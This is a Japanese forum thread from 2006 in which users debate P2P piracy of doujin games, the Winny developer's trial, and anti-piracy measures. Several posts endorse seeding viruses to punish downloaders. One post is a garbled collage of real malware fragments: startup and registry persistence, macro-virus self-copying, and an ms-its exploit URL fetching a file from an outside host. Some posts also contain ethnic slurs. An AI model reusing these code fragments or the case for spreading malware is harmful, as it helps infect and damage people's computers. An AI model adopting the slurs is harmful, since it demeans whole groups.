結局ライトユーザーの抑制にすらほとんどなってないのが現状

85 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/08(水) 19:31:42 ID:JYJBs7XX
違法性とかモラル面に関してはエロ系二次創作同人なんてのはワレザーと同レベル
自分の利益を守るためにウイルス仕込んだって誰も文句は言わないよ

86 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/08(水) 19:51:26 ID:irKhRJ+g
いくつかのサークルと結託して、
「無料でプレイして楽しいですか」「このソフトは無料ではありません」とかなんとか
画面に表示するとか。インストール中とか最初の一回だけでもいい。
DLしているヤシらの良心にちょこっと触れる程度でいい。
あんまりエグイと正規ユーザーも離れかねんが。

あと情報漏洩を防ぎますという名目でwinnyを削除するソフト付けるとか。
自分のソフトにその機能を付けたって良い。あ、勝手に削除したらダメヨ

悪い事と分からんで、あるいは忘れているヤシも少なからず居るだろうから、
意識させる意味はあるんでないかと。


87 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/08(水) 19:55:36 ID:FrrlDCcr
>>86
それやってほしい。
そうすれば、くだらんことばっか言って中身を伴わない同人サークルが
軒並み消え去るからすっきりするな。

88 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/08(水) 20:00:02 ID:LO4EUFS/
風通しが良くなるってことかよ!?
そりゃ分母が減れば取り分は大きくなる計算だが(^ω^#)ギビギビ

89 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/08(水) 20:04:57 ID:kp5V98jB
>>86
インストール中の画面やマニュアルを利用して
訴えかけるのは堅実的な案かも

90 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/08(水) 21:03:36 ID:3Nf0pqqN
>>82
いねえよ

91 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/08(水) 21:15:33 ID:HIsHySO3
>>85
> 違法性とかモラル面に関してはエロ系二次創作同人なんてのはワレザーと同レベル
んなわけない

92 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/08(水) 21:23:20 ID:3Nf0pqqN
>>91
( ゚Д゚)ポカーン

93 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/08(水) 21:29:17 ID:3//+z5pv
>>90
3年前だけど愛媛と群馬で逮捕者が出てる
ttp://internet.watch.impress.co.jp/cda/news/2003/11/27/1289.html

94 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/08(水) 21:46:36 ID:NViBksu+
掲示板から足がついたやつだね。

95 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/08(水) 21:53:55 ID:zLYu3hm/
>>93
その後、逮捕者が続くかと思ったらキンタマコップの発覚で終わり。
金子を逮捕しただけで何の解決にもなってないし。

96 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/08(水) 22:48:33 ID:9GpSUXP2
ttp://internet.watch.impress.co.jp/cda/event/2006/06/09/12274.html
ttp://internet.watch.impress.co.jp/cda/news/2006/10/18/13661.html
http://internet.watch.impress.co.jp/cda/news/2006/06/08/12264.html

取り締まる技術も法律もある。
海外の団体は海外で頑張ってる。
日本でも頑張ってくれや。

DLとかが率先して取り締まってくれんかのう。
結構な額中抜きしやがるんだから。

97 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/08(水) 22:51:16 ID:BoKLQ0tW
金子裁判が結審するまで逮捕することができない
と、なんかの記事で警察が言ってた。

98 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/08(水) 23:00:08 ID:hkR6Sli7
>>96
ブラフだけどな

99 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/08(水) 23:17:45 ID:9GpSUXP2
nyの追跡法なんて、あちこちで解明されてるよ。
商品化までこぎつけてるのが、2〜3社なだけで。

ブラフなら企業のほうが公的機関に取り締まられる。
ネットエージェントのツールは既に商品として売られてるから、
ブラフの可能性は殆ど無い。
で、ネツトエージェントよりメリケンツールは出来が良いとの下馬評。

100 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/08(水) 23:27:19 ID:ZptTzf9p
>>95
キンタマコップ関係ねーよ
キンタマ出たのはその事件の1〜2年先だし
>>97
最初に逮捕して金子逮捕までずいぶん期間があったんだから
金子逮捕は逮捕者が出ない理由にはならないのでは

結局その件もwinnyのファイル共有の方から特定した訳じゃない。
当時は無理といわれてた個人特定も今じゃ不可能ではないようだが
一向に逮捕者が出ないのはなぜだろうか
IP丸出しのWinMXですら最初に2人逮捕してそれっきりだし


101 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/08(水) 23:32:51 ID:3//+z5pv
ひょっとして誰も警察に被害届け出してないとか
そんなわけないか

102 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/08(水) 23:42:16 ID:6ZXSk8Un
>>71
>ウイルス撒いて逮捕されるなら違法コピー流してる奴がとっくに逮捕されてるはず
この差が分からないのか?
故意のウイルスバラ巻き…刑事
違法コピーのバラ巻き…民事&申告なければ一切お咎め無し

103 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/08(水) 23:42:42 ID:P03pefD6
ネットエージェントなんて、僕の友達はすぱはかーだからな

104 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/09(木) 00:00:37 ID:1dOzoY1N
散々犯罪をしているくせに、自分が犯罪の矛先になった途端に
ファビョるやつほどみっともない者は無いな。

105 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/09(木) 00:03:34 ID:1QRVO2p5
P2P利用は全体で一人だと勘定してしまおう。
そうすれば一人で数本かったりしてくれるお得意様だ。

106 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/09(木) 00:04:13 ID:ZACnXnXP
とりあえずDVD化して容量増やしてDLしにくくすることから始めたら?

107 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/09(木) 01:01:44 ID:C6HWIcXc
>>104
まったくだな。散々著作権無視して金儲けしている癖に
いざ自分が著作権無視される側になったらぐだぐだと見苦しい。
お前の物は俺の物、俺の物は俺の物、といったところか。

108 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/09(木) 02:12:38 ID:UcZvgWnS
>>106
8GBくらいのでもジャンジャン流れてるのにどうしろと
BDで配布しろってか

109 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/09(木) 02:22:33 ID:UehRM1D2
BT系特にCometだとファイルがデカイ方が
システム上かえって大規模に流れる罠

110 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/09(木) 05:38:55 ID:qFCEIl4G
いい作品はp2pで入手しても新しく買う
だろ?

111 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/09(木) 06:24:53 ID:1QRVO2p5
買い直しても不正利用の免罪符にならん。

112 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/09(木) 08:10:08 ID:qcdyC0hE
ファイルサイズが1GB超えれば少なくともポート0厨はほぼDL無理、DL出来ても何週間か以上かかるので、
ほぼDL無理になる。

ポート開放状態のアランカル(割者)には通用しないけどな。

静的IPマスカレードを卍解したら規制プロバイダでもガンガン落ちて来る。
光じゃなくても一日20GBとか余裕だし。
光でUSENで解放とかマジギアサードどころかスーパーサイヤ人4のフュージョン状態だな。


113 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/09(木) 10:46:39 ID:K3F752ie
ここを見てると
朝鮮人や中国人の民度まで下がった日本人の多いこと多いこと
在日だったらP2P使ってても仕方ないけど
日本人ならもう少し冷静に考えようぜ

114 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/09(木) 12:13:23 ID:FzqhVX1V
>>113
youtubeを先にどうにかしないとな
圧倒的に規模が違う

115 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/09(木) 13:53:13 ID:lnJbOF5x
>>114
言いたい事はわかるがスレ違いだ

116 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/09(木) 14:26:24 ID:iVEEM8Oc
ヒント:ゲームをつまんなくすれば ながれない

117 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/09(木) 14:46:37 ID:O+S/rjtk
非電源ゲームなら流れない

118 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/09(木) 15:16:37 ID:aJu3PvQO
>100
金子氏の裁判(地裁)が決心して判決が出るまではどこも様子見。
金子氏有罪となれば、一気に逮捕者が出る可能性がある。
無罪の場合でも、判決次第では企業が動く可能性はある。

要するに判決次第って事だな。ACCSの久保田氏がどこかの雑誌インタビューにそう答えてたな。
どこで読んだかは忘れたが……。

119 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/09(木) 15:20:26 ID:aJu3PvQO
>118
決心>結審な。

120 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/09(木) 15:26:30 ID:uXSPKM6n
通り魔が包丁で人を刺したからって
包丁を作った会社を訴えたようなもん

そんなん有罪になるわけねえ


まぁ仮に有罪になって逮捕者がでてもshareに流れてくるだけ
しかもshareは最初のアップロードから拡散するから
個人特定は難しいだろうな

121 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/09(木) 15:46:32 ID:mtKJFo37
包丁は包丁でも、使うヤツの姿が見えなくなる包丁だがな。

122 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/09(木) 16:07:37 ID:97VxG3Zc
料理よりも人を刺すのに適してる包丁だしな。
危険な玩具が回収喰らったりはよくある事だろうがよ

123 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/09(木) 16:12:41 ID:7woWAmly
おれは、後々サークルが有名になった時に、
有名になる前からオレは作品買って、サークル支えてたんだぜ、
って自己満足と友人に自慢するために買ってる。
サークル潰すようなマネだけはせんでくれ・・・。

124 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/09(木) 16:17:22 ID:uXSPKM6n
>>123
もの凄いうざいな

125 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/09(木) 16:45:16 ID:ZACnXnXP
>>123
確かに潰れて欲しくはないね。
ただ淘汰されるのはありだけど。

126 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/09(木) 16:49:56 ID:ob5QcFtL
それで結局無断コピー対策はできたの?

127 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/09(木) 17:25:27 ID:ER18AUVt
CD入れないと起動出来ない仕組みでいいんじゃね?

128 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/09(木) 17:26:08 ID:pqabgDtr
>>118
それは結局インタビューされたから建前としていってるだけでしょ
>>100にあるように最初の逮捕から金子逮捕までずいぶん期間あったわけだし
winMXとか他のp2pは金子関係無いし

金子が有罪になってもそれは金子氏自身の著作権幇助なだけで
winnyそのものが違法か合法かの裁判じゃない
警察側が言っていた、という事を引用するなら
金子は警察に取り調べうけた時に違法コピーを増やさせて
今の著作権のあり方を変えるなんて言ったから幇助で逮捕した
とも言っている

129 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/09(木) 18:25:55 ID:0mBbV8Ke
P2Pしてる人はサークルの1つや2つ潰れてもどーでもいいと思ってる
潰れたらまた別のサークルのゲームを落とすだけ

130 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/09(木) 18:38:16 ID:n6+u88Ib
P2Pで取るけど後に金出して買う奴が友達に居るんだが…こいつをどう思う?
P2Pが悪い事だともわかっていないっぽい…諭したほうがいいのか?

131 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/09(木) 18:49:09 ID:4QSoBcsF
うぃにーとかWinMXが入っていると起動できないとか
そういうのはどうなんだろ

それをきちんと紙などにきちんと書いておいて
もし共有ソフトが入っていたら

付属の紙をご覧になってください

とか出るようにして

132 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/09(木) 19:01:09 ID:1QRVO2p5
>130
わかってないなら諭した方がいいんじゃね。

133 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/09(木) 19:50:50 ID:LwbIEuoX
>>131
Winnyのない別のPCを用意されたらそれまでだ

134 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/09(木) 19:58:37 ID:ugerU5Io
入ってないかってどうやっってチェックするの?

135 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/09(木) 20:06:37 ID:fVt2NDG5
>>129
一つや二つとかじゃなくてサークルとか全く関係無く
気になったゲームを落とすだけだよ
そもそもほとんどの人は実際に無くなったら
本当に困る同人ゲームサークルなんて無い
ってのが現実だと思うが

136 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/09(木) 20:22:42 ID:B4pIaJtD
エロゲのメーカーですら
いつの間にか潰れてたんだ…って感じだしナ。
どーせタケノコみたいに無数に生えてくるし。

137 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/09(木) 20:43:23 ID:LwbIEuoX
同人界のレベルアップのため
元手となる資金が集まりやすい状態になって欲しい
ゲーム開発はなにかと金がかかるものだろうし
自転車操業をやってるサークルには無断コピーは死活問題なんだろう
安い開発費じゃ薄っぺらなゲームしか産み出されない

138 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/09(木) 23:44:49 ID:a0IACw+6
>>128
おまえ根本的な問題が分かってないだろ?
金子氏の裁判で問題になってるのは開発した技術を悪用されたら、その技術の開発者が罪に問われている点だ。
これを認めてしまうと話は日本だけすまなく世界的な大問題になる。

日本の警察側はとっとと有罪にして豚箱にぶち込みたいが、話が外国まで広まってしまったので動きが取れなくなっている。
審議が進めば金子氏の行動を規制することすらできなくなるので、審議自体の進行を止めているのが現状。
有罪になるならないではなく、逮捕拘束されたことすら世界的に見ても前代未聞なんだよ。

だからP2Pを利用してる連中は大手を振っていて、実際どの国でも根本的な対策は取れていないのが現状。
ここで今展開してる話題は1/2-30くらい有用な話も出るが、最初にスレを立てた真性の1とたまに書かれる基地外の意見のせいで全て台無しになってる。

139 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/09(木) 23:59:02 ID:Y42j9bIz
winnyを作ったこと、その技術自体に罪はないけど、
金子自身が、不正利用させるために作った、という趣旨の発言をしているから
話がこじれてるんじゃないかな。


140 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/10(金) 01:21:17 ID:6aWqyBJb
>>127
世の中にはデーモンツールと言う便利なものがあ(ry

141 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/10(金) 01:23:21 ID:6aWqyBJb
>>139
MXの次になるような物を作りたいと言っていたのが問題だけど、
アップデートはほぼ掲示板周りだけだったらしいよ。

検察はダウソ関連のアップデートをしてたといっているが、
それなら金子氏よりnyp作った人の方がモロに(ry

142 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/10(金) 01:29:06 ID:RZhgiVOg
>>138
あれは警察官がやらかしたんで、身内を処分できなくて、
しかたなく作者逮捕に踏み切ったんじゃなかったっけ?
作者も著作権に対して挑発的だったし。

まぁ、どのみち間違いなんだがな。それやるとライティングソフトやら
なんやらひっかかるしね。

>>139
不正利用っつーか、著作権のあり方を考えるとか、
新しいタイプの著作権とかいってたからね。

143 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/10(金) 01:59:51 ID:kFx5NB2I
>>141
真相は密接に関わった人しか分からないが
>金子自身が、不正利用させるために作った、という趣旨の発言をしたから逮捕した
というような記事があったのも事実
裁判で不利になるから公の場ではそういうことを言ってないだけなんじゃ
当人のサイトでも色々著作権の有り方について書いてたし
そんな現状を変えたいと思っていたというのは間違いない

144 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/10(金) 02:41:30 ID:H4u+R/FU
不正利用させるために作ったとか本気で言うとでも思ってんのか?

145 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/10(金) 03:56:19 ID:C2BakTwj
>>137
言ってることはごもっともなんだが
同人界を商業に置き換えてもそのまま通じる主張ですね。
個人的には最近の商業エロゲにこそ頑張って欲しい。


146 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/10(金) 10:20:46 ID:KiIfmnnk
キャッシュを定期的に全消しして自分のコピーをアップロードするという
初代スレ>>1から見るとまさに理想的なウイルスが
キンタマウイルスが出るよりずいぶん前から存在していた
それも亜種が多数でいまだノートンやウイルスバスターでも対応し切れてないものもある

そしてその事による結果が現状。要するに全く効果なし

147 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/10(金) 11:04:42 ID:H4u+R/FU
流石に人間の学習能力の方が上だわな

148 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/10(金) 14:47:19 ID:FSNqU4ts
勤め先の顧問弁護士に聞いてみたら、
nyの人、勝ち目無いってさ。

nyの場合は開発者=公開者だから、
海外で言うところのカザやらシャーマンやらと同じ責任負わされるんだそうだ。
開発した事は問題じゃないけど、不特定多数に公開した時点で弁護しようが無いんだと。

ちなみに、nyの人が有罪になろうが、開発には全く影響無いそうだ。
何故なら、まともな研究者は違法利用される恐れのあるものは、
自分に責任がある間はクローズドでやるのが当たり前だから。

149 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/10(金) 16:44:07 ID:/3LSChs0
釣りとは思えないネタの質の低さだな。
 ・ソフトの配布は無罪。(Winny裁判の争点)
 ・ネットワークの運営・管理は有罪。(NapsterやKaZaaの問題)
なんのネタの仕込みもないし、ID:FSNqU4tsの痛々しい妄想なんだろうな。

150 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/10(金) 17:42:54 ID:uBufo+VT
弁護士(笑)

151 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/10(金) 17:49:44 ID:Zrva9lOb
弁護士(笑)

152 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/10(金) 21:32:42 ID:Q56FYI9t
なかなか興味深かったぞ
そう必死に貶そうとせんでもいいんじゃないか

153 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/10(金) 22:10:22 ID:MnMbdAQ0
弁護士w

154 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/10(金) 22:28:41 ID:wOU24iaP

>>148
台無し

155 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/10(金) 22:38:33 ID:y1eGGa2W
>>148
ならこんなスレ立たんわ。
対策側にも邪魔だから半年ROMってて?

156 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/11(土) 00:31:10 ID:cKZ/zhYl
やっぱウイルスが一番効果的だな。

157 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/11(土) 01:20:31 ID:9BhlCn0h
大体弁護士なんて立場が変われば言うことも変わるからな。
いかに法がいい加減か分かる。

弁護士を何人か集めれば不正DL者も違法に出来るかもしれんね。

んー。あれだ。
要りもしない電波を垂れ流しているNHKが受信料強制徴収できるぐらいなだからな。

158 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/11(土) 04:37:49 ID:sQAaaHXs
なーんか、商業エロゲもパッとせんな…
絵で釣って何千円も払わせてシステムがひどいのを掴まさせてたら
客も逃げるってもんだろ。
それで必死にプロテクトつけてるんだから笑っちゃう。

159 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/11(土) 08:35:31 ID:IQnOs2hF
エロゲー板行けチンカス

160 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/11(土) 09:14:15 ID:Tv+QWqcr
エロゲーのシステムってなんやねん
ただの紙芝居だろ

161 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/11(土) 15:50:57 ID:PsErOOJZ
回想機能が無いとかオートモードが無いとかじゃね?

162 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/11(土) 16:02:58 ID:A6AvLPwW
紙芝居でもシステムはシステムだろ。
ショボイってのには同意するが。

163 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/11(土) 17:29:56 ID:LA+D9Pn2
>>156
だからもともと流れまくりだって
何も考えずにDLしてたら半分くらいウイルス入り

164 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/11(土) 18:17:25 ID:s25mSJUZ
そろそろウィルスは煽りだって気付け
前スレの1はマジだったかもしれんが

165 :<body onload=window()>:2006/11/11(土) 22:09:36 ID:mgxNu+h2
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

??????

166 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/11(土) 22:29:20 ID:sGH8VnDp
やっぱウイルスが一番効果的だな。

167 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/11(土) 22:36:26 ID:5qJdijNH
ワロスなにこのすれw

168 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/11(土) 23:09:04 ID:5Y5Z/TkL
>>165
このスレの蛙には結構効果出てるんでないか。

169 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/11(土) 23:25:36 ID:IF9jsWI8
語咄し誰か流して

170 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/12(日) 00:11:29 ID:LnXEJVMa
P2P対策のほうに意欲を注ぐようになったらおしまい
商業だろうと同人だろうと同じ


171 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/12(日) 00:21:25 ID:n9rhIpGX
> P2P対策のほうに意欲を注ぐようになったらおしまい
作品制作をおろそかにしなければ問題なし

172 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/12(日) 00:33:16 ID:1N5WhwSZ
DLしてるヤシはどうせ買わないのだから実害などないとは言うが、
オマイらだって自分に害が無くても転売屋やアフェ厨は憎いだろ(;´Д`)


173 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/12(日) 00:45:33 ID:oBcHpfBl
>>172
嫉妬は醜いよ
P2Pは犯罪だけど転売やアフィにまで口出すとは

174 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/12(日) 00:57:56 ID:n9rhIpGX
嫉妬はダメ。

ただ、自分に直接害のないことを全部放置するとしたら、それは同時に、
自分に直接害のあることでも他人はスルーする、ということで、ヤな世の中だね。
だから、自分に直接害はなくてもなんかすることは、ときにはよいことなんだよ。

転売は、余計な中間マージンを取る悪徳商売なんで駆逐したいし、
アフィリエイトは、それに目がくらむあまりにうざいことをするなら駆逐したい。

ただ、たとえば、単にアフィリエイトをしているだけのサイトに嫉妬だけで
因縁をつける奴は、まともな人間に害をなす奴なんで駆逐したい。
つまり>>172は駆逐されるといいよ、ってことだよ。
(まあだからといってどうしようもないんだけど)

175 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/12(日) 01:50:12 ID:BiWKz320
買わないやつが多いだろうがP2Pなかった買うって奴がゼロではないだろう。
実害ないわけなんかない。
俺のを買わないとしてもだ。それで市場の活性化が多少なりとも
促進されればあとあと自分たちの利益にもなってくる。

176 :172:2006/11/12(日) 01:56:00 ID:1N5WhwSZ
ただの物の例えダヨ('A`)

もっとかみ砕くなら、頭空っぽなのに億万稼ぐ芸能人とか、
金持ちの息子と言うだけで女とヤリ放題なヤシとか。
誰にも一つぐらい憎き対象はあるでそ。


ああでも、アフィはともかく転売屋は、本当に欲しいヤシから奪(ry

177 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/12(日) 02:01:53 ID:FSl4PZjT
テンバイヤーの存在は悪か

正規のルートから入り、自分の為に買いたい一般入場者から見れば迷惑この上無い存在であるが、
大型イベントの開催の殆どが関東圏での開催である為、地方在住者にとっては高価な交通費や時間・手間などを天秤に掛け、
ある程度のプレミア価格で購入するという選択は一手段として存在しているのは事実である。



178 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/12(日) 02:13:08 ID:lTa5DiER
>>175
プレイした人の絶対数が増えるから
口コミが広がって売り上げあがってるかもしれん

179 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/12(日) 02:19:13 ID:2Jd1ZXce
なんか二番煎じスレみたいのが立ってるぞ
意地悪だからレスしてやらねえ

180 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/12(日) 02:29:38 ID:iXE/xWYe
まあ確かにアフィリエイトにはなんとなーく厭なものを感じなくもないな。
もっとも「俺が商品券貰えるから買うならここでね」ぐらいはっきりきっぱりしているのは嫌いじゃない。

181 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/12(日) 02:32:57 ID:lTa5DiER
アフィのおかげで色んなサイトが生まれるってのもある

182 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/12(日) 02:44:22 ID:n9rhIpGX
>>176
嫉妬で人を憎む奴がいかに憎いかということを具体例を交えて
説明しておいたから俺の>>174のレスを読んどけよ。
というかブログ連合潰しもPS3転売潰しもスレ違いだよ。

>>177
同人サークルから委託をうける通販事業者になればいいわけで、
会場に来た人間ですら買えない量しかない会場来客向けの販売物を
買っていく転売屋は相変わらず正当化できないな、その理屈だと。
遠くの人向けには売ってないものを、悪徳な経路から入手することを
擁護することもできない。

>>178
そういう宣伝手法をとるかとらないかはサークル側の権利であって
無断配布者が勝手にやっていいことではない。
178の理屈は「売り上げ数に関して実害は絶対にある」という理屈の
反論にはなるが、結局は実害があるともないとも分からないままだな。
サークル側の判断の余地なく無断配布者が勝手に宣伝手法を
(事実上)決定して、その結果はサークル側に帰ってくるんだから、
無責任な無断配布者は悪だな。

183 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/12(日) 02:55:35 ID:lTa5DiER
>>182
P2Pが悪なんてのは当たり前すぎて論外

「実害があるともないとも分からない」
だからポジティブに考えようぜ

って言いたかった

184 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/12(日) 02:57:38 ID:+mWIOUbX
>>182
http://ja.wikipedia.org/wiki/%E3%83%86%E3%83%B3%E3%83%90%E3%82%A4%E3%83%A4%E3%83%BC

185 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/12(日) 03:06:22 ID:iXE/xWYe
テンバイヤーには好感は持てない。
しかしながら
>遠くの人向けには売ってないものを、悪徳な経路から入手することを
と言うのはどうなのかな。
サークルの人間が、意図的に遠くの人間には販売しないようにしていると言うのであれば不合理な話だ。

ずいぶん昔に海賊版同人誌が出回ったときにもこうした話題はあったと思うけど、
通販や再販などの手だてをサークル側が用意しておけば、かなり防ぎうる部分だと思うんだけど。

186 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/12(日) 03:37:15 ID:FplH/Jk6
テンバイヤーはほとんど中国人だから嫌い

187 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/12(日) 03:47:31 ID:n9rhIpGX
>>185
転売屋から買う人を、擁護はできんけど悪とはいっとらん。
> 不合理な話だ。
即売会の参加者に売ってるんであって、そこには遠くから
来る人もいれば近くの人もいる。売る売らないの差は
即売会に参加しているか否かなわけで、「参加しなけりゃ
買えない」ということなんだから別段不合理じゃないよ。

188 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/12(日) 11:34:25 ID:lGLeInZZ
>>171
いいたいことはわかるが、前スレを立てた1が悪かった。
・売上が減ったのは全てP2Pのせい
・ウィルスを流せば問題が解決
こんなのが同人作家の思考パターンだと思うと嘆きたくもなる。

189 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/12(日) 12:35:34 ID:nZ8OtWGc
都合のいい事言ってんじゃねえよ乞食が

190 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/12(日) 13:59:05 ID:lGLeInZZ
同人ゲームなんか落としたことねーよw
自省できない人間に発展はないって言ってるだけだろ。
気に食わないものを侮蔑するだけじゃ、生産性はゼロ。

191 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/12(日) 14:05:33 ID:BiWKz320
つーか前スレ>1は散々叩かれてるのに何をいまさら。
前スレ1擁護なんてほとんどないのにバカだろお前。

192 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/12(日) 16:26:10 ID:LZrJfiVG
>>188
そっくりそのまま某商業エロゲ社長の思考にもあてはまるわ。
クソゲー出しといて、よく言うわ。と思った

193 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/12(日) 17:29:47 ID:8lQ5yS61
元々同人ゲーなんて、殆どがシンプルシリーズ以下の出来なのに、金取ろうって考えが甘い
ゴミなんかに金なんか払いたくねーよw

194 :ローカルルール変更議論中@詳細はLR議論スレにて:2006/11/12(日) 17:31:43 ID:2Qn8yVmm
俺はいいものだったら買っているけどなー
サイト作ってなくて、お試しもないサークルも多いから地雷踏みたくないという気持ちはある
2000円以上出して5分でアンインスコしたゲームも少なくないから
CG集なんか、PSDで膨らませているけれど20枚以下で2500円とかいうぼったくりもあるし
しかもポーズがどこかで見たようなのが多かったり・・・・・
見た目「だけ」はいいけど、中身がスカスカなゲームとかあるからねー
無料のFLASHゲーム以下の内容で金取るな!とか思うよ

そんなのを買ってしまう俺の目が腐っているだけですか、そうですか

でも、値段以上に楽しめる同人ソフト(敢えてゲームとは言わない)も多い
そういうのはめったにP2Pに流れないので、コミケなどに足を運ぶことになる
やっぱり、面白いものは買った方が楽しめる
落としたものだと、どうしてもさらっと流して遊んだりするからね

